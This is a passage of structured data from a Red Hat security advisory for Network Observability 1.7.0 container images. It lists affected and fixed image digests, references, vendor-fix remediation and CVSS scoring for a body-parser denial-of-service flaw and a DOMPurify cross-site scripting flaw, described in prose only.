"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", 